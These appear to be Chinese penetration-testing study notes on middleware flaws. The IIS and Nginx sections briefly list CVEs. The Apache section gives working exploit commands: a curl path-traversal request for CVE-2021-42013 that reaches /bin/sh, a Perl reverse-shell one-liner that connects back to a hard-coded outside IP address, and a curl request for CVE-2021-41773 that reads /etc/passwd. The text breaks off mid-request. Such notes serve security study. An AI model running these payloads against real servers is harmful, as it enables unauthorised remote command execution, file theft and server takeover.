中间件安全IISApacheTomcatNginx弱口令不安全配置CVE
# 中间件 -IIS- 短文件 & 解析 & 蓝屏等
1 、短文件:信息收集 前面讲过
2 、文件解析:还有点用 前面讲过
3 、 HTTP.SYS :蓝屏崩溃 前面讲过
4 、 CVE-2017-7269 条件苛刻无意义
# 中间件 -Nginx- 文件解析 & 命令执行等
1 、后缀解析 文件名解析
配置不当:该漏洞与 Nginx 、 php 版本无关,属于用户配置不当造成的解析漏洞。
CVE-2013-4547 :影响版本: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
2 、 cve_2021_23017 无 EXP 有 POC
https://github.com/M507/CVE-2021-23017-PoC
3 、 cve_2017_7529 意义不大
# 中间件 -Apache-RCE& 目录遍历 & 文件解析等
Apache HTTP Server 是美国阿帕奇( Apache )基金会的一款开源网页服务器。该服
务器具有快速、可靠且可通过简单的 API 进行扩充的特点,发现 Apache HTTP
Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍
历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文
件不受通常的默认配置 “ 要求全部拒绝 ” 的保护,则这些请求可能会成功。如果还为这些别
名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache
2.4.49 和 Apache 2.4.50 ,而不影响更早版本。
1 、 cve_2021_42013 RCE
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi
bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'
2 、 cve_2021_41773 目录穿越
Apache HTTP Server 2.4.49 、 2.4.50 版本对路径规范化所做的更改中存在一个路
径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网
站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
curl -v --path-as-is
'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/p
